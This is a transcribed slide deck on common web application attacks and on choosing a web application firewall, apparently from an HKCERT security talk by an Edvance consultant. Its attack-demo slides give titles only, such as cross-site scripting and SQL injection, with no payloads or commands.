Contemporary Web Application Attacks - HKCERT
1y ago
20 Views
1 Downloads
1.83 MB
27 Pages
Report/dmca
Download PDF

Transcription

Contemporary Web ApplicationAttacksIvan PangSenior ConsultantEdvance Limited

AgendaHow Web Application Attack impact to your business?What are the common attacks?What is Web Application Firewall (WAF)?How can we select the right WAF?Edvance Confidential 2

How Web Application Attack impact toyour businessWhat are the attacker going to do?Discover any valuable informationCredit Card information, personal information, corporation financialinformationOn-line Service interruptionDenial of ServiceDamage of corporate imageLooking for some Web Servers to launch AttacksEdvance Confidential 3

How attackers launch attacks?The threat is evolvingWell fundedWell-organizedSophisticatedAutomated attacks are thenew frontierLarge scaleShifting locationsShifting techniquesIBM Internet Security Systems , X-Force 2009Mid-Year Trend and Risk ReportEdvance Confidential 4

What are the common attacks?Top 10 Common Attacks to Web Application(According to OWASP 2010 rc1)http://www.owasp.org/index.php/Top 10Edvance Confidential 5

How bad the damage can be doneTYPICAL WEB ATTACK DEMOEdvance Confidential 6

Attack Step one – Understand WebServer & DatabaseEdvance Confidential 7

Attack Step one – Understand WebServer & DatabaseEdvance Confidential 8

Try to capture other cookie information –Cross-site ScriptingEdvance Confidential 9

Try to capture other cookie information –Cross-site ScriptingEdvance Confidential 10

Bypass login authentication – SQLInjectionEdvance Confidential 11

Bypass login authentication – SQLInjectionEdvance Confidential 12

Extract what data you want – SQLInjectionEdvance Confidential 13

Extract what data you want – SQLInjectionEdvance Confidential 14

Extract what data you want – SQLInjectionEdvance Confidential 15

Extract what data you want – SQLInjectionEdvance Confidential 16

Extract what data you want – SQLInjectionEdvance Confidential 17

Extract what data you want – SQLInjectionEdvance Confidential 18

Shutdown database serverEdvance Confidential 19

Shutdown database serverEdvance Confidential 20

Why Web Application FirewallWeb Application Firewalls alone detect attacks against applications!Traditional firewalls only detect network attacksOnly inspect IP address, port/service numberIDS products only detect known signaturesNo application understanding; high rate of false positives/negativesNo user/session tracking; No protection of SSL trafficDataProtocolApplication(OSI Layer 7 )Protocols(OSI Layer 4 – 6)Network AccessNetwork(OSI Layer 1 – 3)

How to choose the right Web Application FirewallWAF SELECTION CRITERIAEdvance Confidential 22

How to choose the right WAF?Throughput and latencyDepth of protectionEase of useFalse positives andnegativesReportingPriceEdvance Confidential 23

Common WAF requirements of CustomersSecurity:SQLi, Cross Site Scripting, Cross Site Request Forgery, etc mitigation,signature is not enoughFalse positive correction with minimal security impactDetailed Alert/Violation forensicsAnonymous proxy and Botnet awarenessAutomated vulnerability scanner integrationTrack web usernameAutomatic Security UpdateManagement/ReportingCentral management of policies, alerts, reports, etc Flexible security policy assignment and creationEffective reporting systemCustom reporting capabilitiesFlexible in deployment modeEdvance Confidential 24

Deployment mode – Critical Factor ofperformanceTransparent Inline BridgeData CenterSupports full enforcementHigh performance, low latencyFail-open interfacesTransparent & Reverse ProxySwitchHigh performance forcontent modificationURL rewriting, cookie signing,SSL terminationINTERNET ReverseProxyDeployment ne DeploymentPrimarily for monitoring, zero network latencySoftware mode installationEdvance Confidential 25

Preemptive protectionSecurity Research TeamMalicious/TOR IPHacker BHackerCPhishingSiteHacker AAnonymousProxyAttack SourceFeedsApplication vulnerability reconZero Day AttackPhishing IncidentEdvance Confidential 26WAF

Q & A SECTIONEdvance Confidential 27

Why Web Application Firewall Network Access (OSI Layer 1 - 3) Protocols (OSI Layer 4 - 6) Application (OSI Layer 7 ) Network Protocol Data Traditional firewalls only detect network attacks Only inspect IP address, port/service number IDS products only detect known signatures No application understanding; high rate of false positives/negatives

Related Books

Mitigating DDoS Attacks with F5 Technology F5 Technical Brief

Mitigating DDoS Attacks with F5 Technology F5 Technical Brief

Understanding Fileless Attacks on Linux-based IoT Devices with HoneyCloud

Understanding Fileless Attacks on Linux-based IoT Devices with HoneyCloud

Hands-On Ethical Hacking and Network Defense

Hands-On Ethical Hacking and Network Defense

ULTIMATE PRIVACY GUIDE 2019 - Best VPN

ULTIMATE PRIVACY GUIDE 2019 - Best VPN

REPORT The State of Security Within eCommerce 2021 - Imperva

REPORT The State of Security Within eCommerce 2021 - Imperva

Evolution of The World Wide Web: From Web 1.0 to 6

Evolution of The World Wide Web: From Web 1.0 to 6

TYPES OF CLIENT-SIDE ATTACKS - Tala Security

TYPES OF CLIENT-SIDE ATTACKS - Tala Security

Defense for Evolving Cyber Attacks - HKCERT

Defense for Evolving Cyber Attacks - HKCERT

Detect, Prevent and Remediate the Cyber attack - HKCERT

Detect, Prevent and Remediate the Cyber attack - HKCERT

Web Services Basics - IIT Bombay

Web Services Basics - IIT Bombay

The Art Market 2018

The Art Market 2018

PopularTags

Recent Views